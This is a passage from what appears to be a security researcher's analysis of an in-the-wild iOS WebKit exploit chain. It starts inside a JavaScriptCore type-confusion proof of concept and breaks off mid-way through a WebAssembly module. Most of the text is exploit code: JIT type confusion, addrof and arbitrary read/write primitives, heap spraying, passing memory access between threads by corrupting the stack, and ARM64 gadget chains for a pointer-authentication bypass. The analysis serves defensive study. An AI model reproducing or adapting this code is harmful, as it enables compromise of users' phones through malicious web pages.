while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
// real exploit does this - I assumed to force a type check here instead of doing it later - but I can remove it and still crash
/*"uo" in obj;*/
let typeConfused = obj.p1; // JIT compiler assumes typeConfused to be an array of two floats
if (useS3) typeConfused = floatArrWProp2;
f64Arr[0] = typeConfused[1]; // because of the assumption above this is a simple store
i32Arr[0] = i32Arr[0] + 16;
typeConfused[1] = f64Arr[0]; // and this is a simple store as well
// slow down compiler again
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
}
// now they need to JIT this function
const jitIterTotal = 0x1000000;
const jitIterTrain = 0x20000;
for (let jitIterCnt = 0; jitIterCnt < jitIterTotal; jitIterCnt++) {
if (jitIterCnt > jitIterTrain) {
// forcing compilation
toJIT(false,true);
}else{
// training
toJIT(jitIterCnt % 2 && jitIterCnt < 256, jitIterCnt > 4096);
}
if (jitIterCnt == jitIterTrain) {
delete structS1.p2;
// print("After structS1.p2 delete"); print(describe(structS1)); print(describe(structS3));
// 43216 / 43552
}
}
// now the function is hopefully compiled wrong
for (let t = 0; t < 0x100000; t++) new Array(13.37, 13.37, 13.37, 13.37); // force GC (assumed because calling gc() will also work)
delete structS1.p1; // strip of signature fully?
//print("After structS1.p1 delete"); print(describe(structS1)); print(describe(structS3));
// 43328 / 43552
structS1.p1 = fakeFloatArr;
// print("After structS1.p1 assign"); print(describe(structS1)); print(describe(structS3));
// 43440 / 43552
structS1.p2 = 1;
// print("After structS1.p2 assign"); print(describe(structS1)); print(describe(structS3));
// 43552 / 43552
// at this point structS1 is structS3 again so we are fine with calling the function and not drop into the slow path
toJIT(false,false); // this will if everything went ok corrupt fakeFloatArr[1] to point to victimObj+0x10 instead of victimObj
// now force a crash
let converter32 = new Uint32Array(2);
let converterFloat = new Float64Array(converter32.buffer);
let i32objtofloat = function (t) {converter32[0] = t[0]; converter32[1] = t[1] - 0x20000; return converterFloat[0]}
victimObj.prop1 = i32objtofloat([201527, 16783110]); // valid JS obj header?
JSON.stringify(structS1) // just trigger the crash
and invoke via:
DYLD_FRAMEWORK_PATH=./272535@main/Release/ ./272535@main/Release/jsc poc.js
The cassowary module contains two functions, an exported one that is used to do a single exploitation attempt and the main one that contains the actual exploit and all the relevant code for it. This bigger function contains:
The reason for the worker thread is likely to provide a clean execution environment for the exploit, making it more deterministic and allowing for easy retries by restarting the worker. After obtaining the R/W primitive in the worker, it is then transferred to the main thread by corrupting its stack (more details later), which is very slick and also doesn't add much complexity to the design, so I think their decision to use a worker thread is a solid one.
The inner exploit function contains helpers and five main functions which:
The misaligned pointer they get from the type confusion is now pointing to
From this the exploit will create an
In practice things aren't this easy because the engine might perform checks and then reject the fake float array, because of this the exploit actually builds the
function jittedWriter(t, n) {
let r = exploit_module.gRWArray1[0];
f64_arrbuf7[0] = r[2];
f64_arrbuf7[1] = r[4];
f64_arrbuf7[2] = r[5];
f64_arrbuf7[3] = r[0];
f64_arrbuf7[4] = r[1];
r = exploit_module.gRWArray1[2];
r[t] = n
}
They copy 5 floats from
I assume the reason for using these indices is to keep the JIT from loading both
They JIT this function while both index 0 and 2 are a training object:
let training_obj_mbe = {p1: 1, p2: 1, length: 16};
Array.prototype.fill.call(training_obj_mbe, 1.1);
[...]
exploit_module.gRWArray1[0] = training_obj_mbe;
exploit_module.gRWArray1[2] = training_obj_mbe;
for (let t = 0; t < 0x100000; t++) jittedWriter(1, 1.1);
Then they create this
m.addrof = function(n) { // po
targetObj.b1 = n; // set object in butterfly
exploit_module.gRWArray1[2] = training_obj_mbe; // avoid sideeffects of obj 2 (the function is dual purpose)
jittedWriter(1, 1.1); // trigger
return f64_to_num(f64_arrbuf7[0]) // now they can read the float from the array and then convert it back to a number
};
This function operates on a specifically corrupted
exploit_module.gRWArray1[0] = exploit_module.type_confused_float_arr[1];
exploit_module.type_confused_float_arr[1] = null;
Where
The setup for the object we have a misaligned pointer to is the following:
var fakeHdr = exploit_module.hdr2float([0x31337, 0x1001706]); // m_indexingTypeAndMisc: 6 (NonArrayWithDouble) m_type: 23 (ObjectType) m_flags: 0, m_cellState: 1 (DefinitelyWhite)
exploit_module.flaky_obj.lo = fakeHdr;
exploit_module.flaky_obj.co = targetObj;
So to summarise: at this point they have
Sidenote:
The target object is surrounded by 256 objects below and another 256 objects above it. I think for this step the Eden GC from above is probably important as they need to guarantee that either
I don't fully understand the reason to spray another 256 objects after
exploit_module.tmpOptArr = [];
for (let t = 0; t < 256; t++) exploit_module.tmpOptArr[t] = {a1: 3.14, a2: 1.1};
let targetObj = {b1: exploit_module.ref2};
targetObj[0] = 1.1;
targetObj[1] = 1.1;
targetObj[2] = 1.1;
targetObj[3] = 1.1;
targetObj[4] = 1.1;
for (let t = 256; t < 512; t++) exploit_module.tmpOptArr[t] = {a1: 3.14, a2: 1.1};
// the two around the target seem to be important too
let obj_after_target = exploit_module.tmpOptArr[256]; // l
obj_after_target[0] = 1.1;
obj_after_target[1] = 1.1;
obj_after_target[2] = 1.1;
obj_after_target[3] = 1.1;
obj_after_target[4] = 1.1;
let obj_before_target = exploit_module.tmpOptArr[255]; // c
obj_before_target[0] = 1.1;
obj_before_target[1] = 1.1;
obj_before_target[2] = 1.1;
obj_before_target[3] = 1.1;
obj_before_target[4] = 1.1;
After that they gain R/W based on float64 arrays. This is done by initially getting a legitimate struct ID of an object and setting it on
Afterwards they use the
Then they use the relative OOB write primitive to corrupt the butterfly pointer of the adjacent object to
Finally they JIT two functions that overwrite the butterfly pointer of the float array to point to an arbitrary address and then read/write from it and afterwards reset it to the value of
The R/W functions are the following and get jitted in the following way:
function read_jit() {
let float_arr = rw_pair[0];
let float_arr_obj = rw_pair[1];
float_arr[2] = 3.3;
float_arr_obj[0] = f64_arrbuf7[0]; // addr to read from
useless[1] = 3.3;
f64_arrbuf7[0] = float_arr[0]; // value being read
float_arr_obj[0] = f64_arrbuf7[1]; // reset
return f64_arrbuf7[0] // return read value
}
for (let t = 0; t < 1048576; t++) {
useless = new Array(1, 2, 3);
read_jit(t + 3.3);
read_jit(t + .1)
}
function write_jit() {
let float_arr = rw_pair[0];
let float_arr_obj = rw_pair[1];
float_arr[2] = 3.3;
float_arr_obj[0] = f64_arrbuf7[0];
useless[1] = 3.3;
float_arr[0] = f64_arrbuf7[2];
float_arr_obj[0] = f64_arrbuf7[1]
}
for (let t = 0; t < 1048576; t++) {
useless = new Array(1, 2, 3);
write_jit(t + 3.3, 13.37);
write_jit(t + 3.3, 13.37)
}
I assume the reason for
Afterwards they upgrade their read primitive, I assume so that they can read all values, not just those that are valid floats. For that they abuse the fact that the length of a butterfly is stored inside of the butterfly itself, so when they modify the butterfly pointer of an array and then access the
Initially they need to JIT the read function that fetches the length:
let read_abused_arr = new Array(4096).fill(13.37);
function jitted_read_abused_arr_len() {
return read_abused_arr.length
}
for (let t = 0; t < 0x100000; t++) jitted_read_abused_arr_len(t + .1);
Then they setup the read:
const read_abused_arr_addr = m.addrof(read_abused_arr);
const read_abused_arr_orig_backend_ptr = m.read(read_abused_arr_addr + 8);
m.stage2_read = function(t) { // Ys
m.write_v1(read_abused_arr_addr + 8, t + 8);
let i = jitted_read_abused_arr_len();
m.write_v1(read_abused_arr_addr + 8, read_abused_arr_orig_backend_ptr);
return i >>> 0
};
and also provide multiple versions of the read and write primitives reading different sizes and types.
Finally they validate their primitives by setting values in an array and then reading them with the read function and then change them with the write and read them back from JS.
At this point I would call R/W done, but they have a R/W class that they want to pass primitives to. This class uses WebAssembly to do the actual read and write, so let's have a look at this next.
The wasm R/W class initialises two very simple wasm modules:
(module
(type (;0;) (func (result i64)))
(type (;1;) (func (param i64)))
(func (;0;) (type 0) (result i64)
global.get 1)
(func (;1;) (type 1) (param i64)
local.get 0
global.set 1)
(table (;0;) 1 externref)
(memory (;0;) 1)
(global (;0;) (mut v128) (v128.const i32x4 0x33333333 0x33333333 0x33333333 0x33333333))
(global (;1;) (mut i64) (i64.const -6067004223159161907))
(global (;2;) (mut v128) (v128.const i32x4 0x33333333 0x33333333 0x33333333 0x33333333))
(global (;3;) (mut externref) (ref.null extern))
(global (;4;) (mut externref) (ref.null extern))
(global (;5;) (mut externref) (ref.null extern))
(global (;6;) (mut externref) (ref.null extern))
(global (;7;) (mut externref) (ref.null extern))
(export "edfy" (global 1))
(export "memory" (memory 0))
(export "btl" (func 0))
(export "alt" (func 1)))
They define two functions
The R/W module then exports a lot of helpful functions to read and write different sizes and types, as well as wrapping them around the number class to make handling easier.
So far all of this has happened in the worker thread that was created for exploitation. In there the exploit now has full R/W, but the attacker somehow needs to transfer it to the main thread to continue exploitation there. For this the worker signals the main thread, which then invokes the following flow on the main thread:
const marker_array = JSON.parse(("[0.0, 2.2, 3.3, 4.4, 5.5, 6.6, 7.7, 8.8, 9.9, 10.10]")); // the reason they do this is to avoid having 5.5 as a number on the stack somewhere ig
const rw = new rw_module; // c
const com_arr_towards_worker = rw.arr_obj_num_num_prop;
marker_array[0] = rw.numConv.bigint_to_f64(0xdeadn);
marker_array[1] = -0;
com_arr_towards_worker[0] = rw.webasm_instance;
com_arr_towards_worker[1] = rw.wasm_instance2;
const take_primitives = () => {
const arr_to_find = [0x55432, com_arr_towards_worker, 0x55432, 0xFF432, marker_array, 0xFF432];
const recursive_func = (t, ...e) => {
try {
recursive_func(t + 1, ...arr_to_find, ...e)
} catch (t) {}
};
recursive_func(0, arr_to_find);
if (marker_array[5] !== 6.6) {
debug_log("");
try {
debug_log("");
rw.ws = rw.numConv.f64_to_bigint(marker_array[0]);
rw.ds = rw.numConv.f64_to_bigint(marker_array[1]);
rw.ys = rw.numConv.f64_to_bigint(marker_array[2]);
rw.As = rw.numConv.f64_to_bigint(marker_array[3]);
rw.arr_obj_num_num_prop_addr = rw.numConv.f64_to_bigint(marker_array[4]);
fingerprint_module.device_properties.rw = rw; // Xn
t()
} catch (t) {
debug_log(t)
}
} else window.setTimeout(take_primitives, 0)
};
The code will now in a loop push the recursive function with its arguments on to the stack until
for (let offset = -0x1800n; offset > -0x3000n; offset -= 0x8n) {
const addr2check = stack_base - offset;
// check if we have the marker
if (_rw.read64(addr2check) == 0xfffe000000055432n &&
_rw.read64(addr2check + 0x8n * 2n) == 0xfffe000000055432n &&
_rw.read64(addr2check + 0x8n * 3n) == 0xfffe0000000ff432n &&
_rw.read64(addr2check + 0x8n * 5n) == 0xfffe0000000ff432n) {
and once it finds the array named
const com_arr_towards_worker = _rw.read64(addr2check + 0x8n * 1n);
const com_arr_towards_worker_butterfly = _rw.read64(com_arr_towards_worker + 0x8n);
const marker_array = _rw.read64(addr2check + 0x8n * 4n);
const marker_array_butterfly = _rw.read64(marker_array + 0x8n);
const wasm_i1 = _rw.read64(com_arr_towards_worker_butterfly);
const wasm_i1_cpp = _rw.read64(wasm_i1 + toBigInt(offsets[webasm_js_to_cpp_instance]));
const wasm_i1_cpp_globals = wasm_i1_cpp + toBigInt(offsets[webasm_cpp_instance_global_0_off]);
const wasm_i2 = _rw.read64(com_arr_towards_worker_butterfly + 0x8n);
const wasm_i2_cpp = _rw.read64(wasm_i2 + toBigInt(offsets[webasm_js_to_cpp_instance]));
const wasm_i2_cpp_globals = wasm_i2_cpp + toBigInt(offsets[webasm_cpp_instance_global_0_off]);
_rw.w64_wrapper(wasm_i2_cpp + toBigInt(offsets[wasm_cpp_gc_mark]), 0x8000000000000000n);
_rw.w64_wrapper(wasm_i1_cpp + toBigInt(offsets[wasm_cpp_gc_mark]), 0x8000000000000000n);
_rw.w64_wrapper(wasm_i1_cpp_globals, wasm_i2_cpp_globals);
_rw.w64_wrapper(marker_array_butterfly + 0x0n, wasm_i2_cpp);
_rw.w64_wrapper(marker_array_butterfly + 0x8n, wasm_i2_cpp_globals);
_rw.w64_wrapper(marker_array_butterfly + 0x10n, wasm_i1_cpp);
_rw.w64_wrapper(marker_array_butterfly + 0x18n, wasm_i1_cpp_globals);
_rw.w64_wrapper(marker_array_butterfly + 0x20n, com_arr_towards_worker);
_rw.w64_wrapper(marker_array_butterfly + 0x28n, 0x0n);
And with this they finally have R/W on the main thread, what a ride!
Their next high-level goal is to execute native code inside of the WebContent process to run their LPE, but before they can load and link a dylib they first need to get a function calling primitive and for this on newer devices a PAC bypass is required, so let's have a look at how they achieve this next.
In this section we will have a look at the PAC bypass (
Once the exploit gained R/W, code execution returns to the main module. This will now do PAC detection by getting a function pointer from both a
In this capture, PAC is detected, which means they now need to acquire a signer.
This is done by selecting a PAC bypass (for this capture against iOS 17.1, that is
For
Because the original
The main PAC bypass module then has 11 classes, they can roughly be divided into
I think it makes sense to explain the PAC bypass module in order of primitives acquired, so let's start with the caller:
For this they create an
Specifically they:
For this they need a couple of memory buffers and at this stage they get them by creating an array buffer and then operating on its backend storage.
At this point they have a PACIZA calling primitive with x1 fully controlled. Based on this they gain two more primitives, which gives an arbitrary x0, x1 and x2 calling primitive and another to call arbitrary PACIZA pointers with arbitrary x0, x1, x2 and x3, but where x0 and x1 are the same value. In both of these new primitives they also get the return value of the call by storing it to memory and reading it back after the call.
For the former the following call chain is used:
_autohinter_iterator_end:
c10000b4 cbz x1, 0x18
221040f9 ldr x2, [x1, 0x20] - enet_allocate_packet_payload_default
820000b4 cbz x2, 0x18
200440f9 ldr x0, [x1, 8] - buf5_80
211840f9 ldr x1, [x1, 0x30] - buf4_768
5f081fd6 braaz x2
c0035fd6 ret
enet_allocate_packet_payload_default:
7f2303d5 pacibsp
f44fbea9 stp x20, x19, [sp, -0x20]!
fd7b01a9 stp x29, x30, [sp, 0x10]
fd430091 add x29, sp, 0x10
f30300aa mov x19, x0
48100fb0 adrp x8, 0x1e209000
086d41f9 ldr x8, [x8, 0x2d8]
e00301aa mov x0, x1 - buf4_768
1f093fd6 blraaz x8 - _HTTPConnectionFinalize
f40300aa mov x20, x0
800000b5 cbnz x0, 0x38
48100fb0 adrp x8, 0x1e209000
087541f9 ldr x8, [x8, 0x2e8]
1f093fd6 blraaz x8 - xmlSAX2GetPublicId_ref
740a00f9 str x20, [x19, 0x10] - stores to buf5_80+0x10
fd7b41a9 ldp x29, x30, [sp, 0x10]
f44fc2a8 ldp x20, x19, [sp], 0x20
ff0f5fd6 retab
_HTTPConnectionFinalize: // there are some CFRelease calls etc in there as well that are skipped because the ptrs are null (omitted for readability)
PACIBSP
STP X20, X19, [SP,#-0x10+var_10]!
STP X29, X30, [SP,#0x10+var_s0]
ADD X29, SP, #0x10
MOV X19, X0
LDR X8, [X0,#0x40]
CBZ X8, loc_192E60A8C
LDR X1, [X19,#0x28]
MOV X0, X19
BLRAAZ X8
LDR X0, [X19,#0x138] ; cf
CBNZ X0, loc_192E60AD0
LDR X8, [X19,#0x158]
CBZ X8, loc_192E60AF4
LDR X0, [X19,#0x148]
BLRAAZ X8
; CODE XREF: __HTTPConnectionFinalize+84↑j
LDR X8, [X19,#0x178] - _autohinter_iterator_begin_paciza
LDR W0, [X19,#0x88] ; int
CBZ X8, loc_192E60B20
LDP X1, X2, [X19,#0x180] - x1/buf1_80
LDR X3, [X19,#0x190] - 0x1CCCCCCC
BLRAAZ X8
; CODE XREF: __HTTPConnectionFinalize+C4↓j
; __HTTPConnectionFinalize+D0↓j ...
MOV W8, #0xFFFFFFFF
STR W8, [X19,#0x88]
; CODE XREF: __HTTPConnectionFinalize:loc_192E60B20↓j
LDP X29, X30, [SP,#0x10+var_s0]
LDP X20, X19, [SP+0x10+var_10],#0x20
RETAB
_autohinter_iterator_begin:
c20000b4 cbz x2, 0x18
430840f9 ldr x3, [x2, 0x10] - dict.ab
830000b4 cbz x3, 0x18
400440f9 ldr x0, [x2, 8] - dict.sb
421840f9 ldr x2, [x2, 0x30] - dict.x2
7f081fd6 braaz x3
c0035fd6 ret
And for the latter they invoke the following call chain:
_autohinter_iterator_end:
c10000b4 cbz x1, 0x18
221040f9 ldr x2, [x1, 0x20] - _HTTPConnectionFinalize_paciza
820000b4 cbz x2, 0x18
200440f9 ldr x0, [x1, 8] - buf2_544
211840f9 ldr x1, [x1, 0x30] - 0
5f081fd6 braaz x2
c0035fd6 ret
_HTTPConnectionFinalize: // there are some CFRelease calls etc in there as well that are skipped because the ptrs are null (omitted for readability)
PACIBSP
STP X20, X19, [SP,#-0x10+var_10]!
STP X29, X30, [SP,#0x10+var_s0]
ADD X29, SP, #0x10
MOV X19, X0
LDR X8, [X0,#0x40]
CBZ X8, loc_192E60A8C
LDR X1, [X19,#0x28]
MOV X0, X19
BLRAAZ X8
LDR X0, [X19,#0x138] ; cf
CBNZ X0, loc_192E60AD0
LDR X8, [X19,#0x158]
CBZ X8, loc_192E60AF4
LDR X0, [X19,#0x148]
BLRAAZ X8
; CODE XREF: __HTTPConnectionFinalize+84↑j
LDR X8, [X19,#0x178] - _EdgeInfoCFArrayReleaseCallBack_paciza
LDR W0, [X19,#0x88] ; int
CBZ X8, loc_192E60B20
LDP X1, X2, [X19,#0x180] - early_malloc_buffer/x2
LDR X3, [X19,#0x190] - x3 (ib)
BLRAAZ X8
; CODE XREF: __HTTPConnectionFinalize+C4↓j
; __HTTPConnectionFinalize+D0↓j ...
MOV W8, #0xFFFFFFFF
STR W8, [X19,#0x88]
; CODE XREF: __HTTPConnectionFinalize:loc_192E60B20↓j
LDP X29, X30, [SP,#0x10+var_s0]
LDP X20, X19, [SP+0x10+var_10],#0x20
RETAB
_EdgeInfoCFArrayReleaseCallBack:
7f2303d5 pacibsp
f44fbea9 stp x20, x19, [sp, -0x20]!
fd7b01a9 stp x29, x30, [sp, 0x10]
fd430091 add x29, sp, 0x10
f30301aa mov x19, x1
f40300aa mov x20, x0
290440f9 ldr x9, [x1, 8] - buf4_80
280940f9 ldr x8, [x9, 0x10] - enet_allocate_packet_payload_default_paciza
880000b4 cbz x8, 0x30
200140f9 ldr x0, [x9] - buf3_80
610240f9 ldr x1, [x19] - sb
1f093fd6 blraaz x8
e00314aa mov x0, x20
e10313aa mov x1, x19
fd7b41a9 ldp x29, x30, [sp, 0x10]
f44fc2a8 ldp x20, x19, [sp], 0x20
ff2303d5 autibsp
d0071eca eor x16, x30, x30, lsl 1
5000f0b6 tbz x16, 0x3e, 0x50
208e38d4 brk 0xc471
08590514 b 0x156470
enet_allocate_packet_payload_default:
7f2303d5 pacibsp
f44fbea9 stp x20, x19, [sp, -0x20]!
fd7b01a9 stp x29, x30, [sp, 0x10]
fd430091 add x29, sp, 0x10
f30300aa mov x19, x0
48100fb0 adrp x8, 0x1e209000
086d41f9 ldr x8, [x8, 0x2d8] - dict.ab
e00301aa mov x0, x1
1f093fd6 blraaz x8
f40300aa mov x20, x0
800000b5 cbnz x0, 0x38
48100fb0 adrp x8, 0x1e209000
087541f9 ldr x8, [x8, 0x2e8]
1f093fd6 blraaz x8 - xmlSAX2GetPublicId_ref
740a00f9 str x20, [x19, 0x10] - stores to buf3_80 + 0x10
fd7b41a9 ldp x29, x30, [sp, 0x10]
f44fc2a8 ldp x20, x19, [sp], 0x20
ff0f5fd6 retab
xmlSAX2GetPublicId_ref:
mov x0, 0
ret
Oddly, this is needlessly complex; I don't see a reason why they couldn't have removed some of the gadgets. All of the PACIZA pointers come from regions in the dyld shared cache where they are stored signed and can be read out. By overly using these gadgets they burn more of these pointers when caught, which is why I would've assumed there is a strong incentive to reduce the number of gadgets used.
With these two primitives they are ready to perform the PAC bypass and have also gained the ability to call malloc (by using a PACIZA pointer to
For the PAC bypass they create an
This will land in
PACIBSP
STP X24, X23, [SP,#-0x10+var_30]!
STP X22, X21, [SP,#0x30+var_20]
STP X20, X19, [SP,#0x30+var_10]
STP X29, X30, [SP,#0x30+var_s0]
ADD X29, SP, #0x30
MOV X19, X3
MOV X20, X2
MOV X21, X0
MOV W23, #0x10
MOV W0, #0x10
MOV W1, #0x69EEEF37
BL _malloc_type_malloc_8
MOV X22, X0
MOV X0, X21
MOV X2, X22
BL _objc_msgSend$getUUIDBytes_
STR X23, [X20]
ADRP X16, #_free_ptr@PAGE
LDR X16, [X16,#_free_ptr@PAGEOFF]
PACIZA X16
STR X16, [X19]
MOV X0, X22
LDP X29, X30, [SP,#0x30+var_s0]
LDP X20, X19, [SP,#0x30+var_10]
LDP X22, X21, [SP,#0x30+var_20]
LDP X24, X23, [SP+0x30+var_30],#0x40
RETAB
As you can see they malloc a 0x10 byte object, store the bytes of the UUID in it and then load the pointer to
The pattern can be reproduced with the following code:
typedef size_t (*fn_t)(const char *s);
fn_t f(void)
{
return strlen;
}
Which will generate the following assembly for
adrp x16, reloc.strlen
ldr x16, [x16]
paciza x16
mov x0, x16
ret
On its own this isn't a security bug because the pointer is inside the
I think the most pressing out of them was Swift, which is also why I speculate that it took Apple till iOS 18 beta 1 to address this issue. Since then the linker will always protect
I assume that both
With this they can then sign
This signing functionality is then exported back to the main module.
Finally they have a class that supports calling with up to 8 arguments.
For this they use a wasm module that defines 3 functions. They take in 16 32-bit arguments in function
(module
(type (;0;) (func (param i64 i64 i64 i64 i64 i64 i64 i64) (result i64)))
(type (;1;) (func (param i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32) (result i64)))
(type (;2;) (func (param i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32)))
(func (;0;) (type 0) (param i64 i64 i64 i64 i64 i64 i64 i64) (result i64)
i64.const 0)
(func (;1;) (type 1) (param i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32) (result i64)
local.get 1
i64.extend_i32_u
i64.const 32
i64.shl
local.get 0
i64.extend_i32_u
i64.or
local.get 3
i64.extend_i32_u
i64.const 32
i64.shl
local.get 2
i64.extend_i32_u
i64.or
local.get 5
i64.extend_i32_u
i64.const 32
i64.shl
local.get 4
i64.extend_i32_u
i64.or
local.get 7
i64.extend_i32_u
i64.const 32
i64.shl
local.get 6
i64.extend_i32_u
i64.or
local.get 9
i64.extend_i32_u
i64.const 32
i64.shl
local.get 8
i64.extend_i32_u
i64.or
local.get 11
i64.extend_i32_u
i64.const 32
i64.shl
local.get 10
i64.extend_i32_u
i64.or
local.get 13
i64.extend_i32_u
i64.const 32
i64.shl
local.get 12
i64.extend_i32_u
i64.or
local.get 15
i64.extend_i32_u
i64.const 32
i64.shl
local.get 14
i64.extend_i32_u
i64.or
i32.const 0
call_indirect (type 0)
return)
(func (;2;) (type 1) (param i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32) (result i64)
local.get 0
local.get 1
local.get 2
local.get 3
local.get 4
local.get 5
local.get 6
local.get 7
local.get 8
local.get 9
local.get 10
local.get 11
local.get 12
local.get 13
local.get 14
local.get 15
call 1
return)
(func (;3;) (type 2) (param i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32)
(local i64)
local.get 0
local.get 1
